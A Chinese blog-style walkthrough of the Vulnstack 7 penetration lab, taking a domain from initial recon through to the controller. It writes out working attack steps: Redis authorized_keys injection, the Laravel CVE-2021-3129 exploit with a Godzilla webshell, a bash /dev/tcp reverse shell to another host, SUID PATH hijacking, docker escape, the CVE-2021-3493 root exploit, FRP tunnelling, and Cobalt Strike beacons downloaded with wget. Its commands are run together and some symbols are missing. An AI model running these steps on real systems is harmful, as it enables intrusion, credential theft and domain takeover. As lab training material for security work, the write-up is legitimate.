声明本文所涉及的技术、代码、工具及方法仅供网络安全研究与授权测试使用。未经目标系统所有者书面授权严禁对任何系统进行渗透测试、漏洞探测或攻击行为。作者本人对因滥用本文内容而导致的任何直接或间接后果不承担法律责任。请遵守《中华人民共和国网络安全法》及相关法律法规合法合规地使用技术。未经授权的测试属于违法行为后果自负。环境配置参考redis服务 要用root开启万字讲解内网横向渗透vulnstack七红日靶场7实战全流程-CS上线全部Web1/Web2/PC1/PC2/DC_红日靶场七-CSDN博客靶机下载地址漏洞详情http://vulnstack.qiyuanxuetang.net/vuln/detail/9/信息收集nmap扫描发现端口fscan进行扫描发现存在未授权redis服务还有cve漏洞Redis渗透生成ssh私钥在攻击机中生成一对RSA 非对称加密密钥默认在当前用户.ssh目录下创建私钥文件id_rsa和公钥文件id_rsa.pub该密钥对可用于实现SSH免密登录、数字签名或加密传输等安全认证场景。# 执行密钥生成命令ssh-keygen -t rsa查看生成是公钥cat ~/.ssh/id_rsa.pub写入到Redis服务器redis-cli –h 192.168.152.168依次执行命令config set dir /root/.ssh/ config set dbfilename authorized_keys set marginl \n\n\n\ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZi2rJFX7o4G4r/Fdvs3iNOSfE/ecm77p7mZkkRnMpo6sxIITdZ4PRXmf2MyqypsRKSznZZrs/kDqsfEYp4IplfRvsG32N9WeJgr8WCkdm3kBd9QcxRBCfb7rIanjukKw8YzNfFXKLxVMhKgzfCudtClSc2CZcPcOGCwhqoYqTbZclkIHxCmHx5x7SxMr7pdTP1tWlm2Csar0ASnb9tP/AUkvLlJO9tj0m6rkYgwRcOaftzWwrzyQcXj6q2PToQxDy5tFVyBAI1N610mee9rGrIboEMPeIGlzbNBBl5yCINCRKatqHZMCYQFU0sQJzWNLyoAKEu/fIsVzTj9dEDR4cADHZKfCN2xK2w6JyJ6RkunzykRe9sRfHZEke7xCqLX0VCydeU3R2WMqvSJx6DYU6OJMft0djMtToXgtuNzVpETxRSLDhhy2IGv1eWusuciIZ6mZ7MJpZhUIDazySw3q1bpp8owG0OhSGFIFwElOjVF7BOQnyAhoWVk kalikali \n\n\n save进行ssh连接ssh root192.168.152.168 -i ~/.ssh/id_rsa同时在利用findshell进行ssh连接 方便上传文件认证用上面生成的私钥web渗透laravel渗透访问81端口http://192.168.152.168:81/存在Laravel服务 有现成cvepoc 下面是poc地址https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP执行pocpython laravel-CVE-2021-3129-EXP.py http://192.168.152.168:81成功拿到了连接地址只不过poc版本老 需要哥斯拉2.96https://github.com/BeichenDream/Godzilla/releases/tag/v2.96-godzilla运行java -jar Godzilla-V2.96.jar记得将有效载荷选择为php利用上面运行得到的poc地址 成功连接docker逃逸查看根目录文件ls -la /发现存在docker 需要实现docker逃逸因为交互性很差 所以 我们反弹shell到web1 web1开启一个监听在web2执行反弹shellbash -c exec bash -i /dev/tcp/192.168.52.10/55551成功回连查看suid特权文件 发现有一个shell 一个passwdpasswd 是乱码的那么执行shell看看file /home/jobs/shell发现是elf可执行文件接着查看同目录下的demo.c文件 有一个sysytem(ps)这里考虑PATH环境变量劫持提权攻击cd /tmp echo /bin/bash ps chmod 777 ps echo $PATH export PATH/tmp:$PATH cd /home/jobs ./shell准备恶意程序cd /tmp - 进入可写目录echo /bin/bash ps - 创建一个名为 ps 的文件内容为 /bin/bashchmod 777 ps - 赋予该文件所有用户可执行权限劫持系统命令路径echo $PATH - 查看当前系统的命令搜索路径export PATH/tmp:$PATH - 关键步骤将 /tmp 目录添加到 PATH 环境变量的最前面。这意味着当系统需要执行一个命令时会优先在 /tmp 目录下寻找。触发执行并提权cd /home/jobs./shell - 执行这个SUID程序成功提权开始挂载这里提前把cdk文件 下载到靶机 具体方法可以看我上一篇文章./cdk run mount-disk成功挂载在挂载的目录下发现账号密码 ubuntussh登录ssh ubuntu192.168.52.20web2提权web2下载fscan 然后扫描CVE-2021-3493是Linux内核中的一个高危本地权限提升的安全风险它主要影响Ubuntu系统。攻击者可以利用此它从普通用户权限提升至root权限https://github.com/briskets/CVE-2021-3493将下载的文件上传到靶机攻击机需要开启http服务具体方法参考上一篇文章gcc exploit.c -o exploit_ljn chmod x exploit_ljn ./exploit_ljn成功提权FRP配置第一层反向代理1.下载文件并且解压wget https://ghproxy.net/https://github.com/fatedier/frp/releases/download/v0.61.0/frp_0.61.0_linux_amd64.tar.gz2.配置frpc.toml文件serverAddr 192.168.152.128 serverPort 7000 [[proxies]] name socks5 type tcp remotePort 12347 [proxies.plugin] type socks5kali执行/frps -c frps.toml将frpc frpc.toml上传到web1kali配置代理配置/etc/proxychains4.conf文件添加socks5 0.0.0.0 12347tips:这里还可以利用msf上线 直接添加路由PC1渗透访问PC1的通达OA服务192.168.52.30:8080需要配置socks5代理192.168.59.128:12347利用通达OA工具成功扫出漏洞直接文件上传 然后利用蚁剑连接要配置代理成功拿到shell添加路由kali添加路由ip route add 192.168.152.0/24 dev eth0 route add -net 192.168.52.0 netmask 255.255.255.0 gw 192.168.152.168 eth0Web1添加转发功能sysctl -w net.ipv4.ip_forward1Web2添加路由​ route add -net 192.168.152.0 netmask 255.255.255.0 gw 192.168.52.10 eth0 ​PC1添加路由​ route add 192.168.152.0 mask 255.255.255.0 192.168.52.10 ​成功连通cs上线1.配置监听器https利用cs插件genCrossC2.Win生成linux木马genCrossC2.exe 192.168.59.128 10050 ./.cobaltstrike.beacon_keys null Linux x64 ljn-10050.out raw将生成的out文件放入web1 并且运行cs成功上线web1接着在web1的baecon文件ljn-10050.out目录中执行python3 -m http.server 8888web2下载wget http://192.168.52.10:8888/ljn-10050.out执行木马 成功上线web2再次添加cs监听器选择 payload 类型Beacon HTTP并配置回连的IP地址团队服务器的IP地址192.168.152.128和端口10087任意不冲突即可。生成木马因为蚁剑已经连接了pc1 上传木马文件执行木马文件成功上线pc1pc1抓取哈希明文密码成功拿到域管理员的账号密码进行一些端口扫描 信息收集CS创建SMB监听横向移动手动打开PC1防火墙配置成功上线DC继续上述操作这里我pc2没有成功上线不知道哪里有问题直接拿参考这里的上线pc2参考万字讲解内网横向渗透vulnstack七红日靶场7实战全流程-CS上线全部Web1/Web2/PC1/PC2/DC_红日靶场七-CSDN博客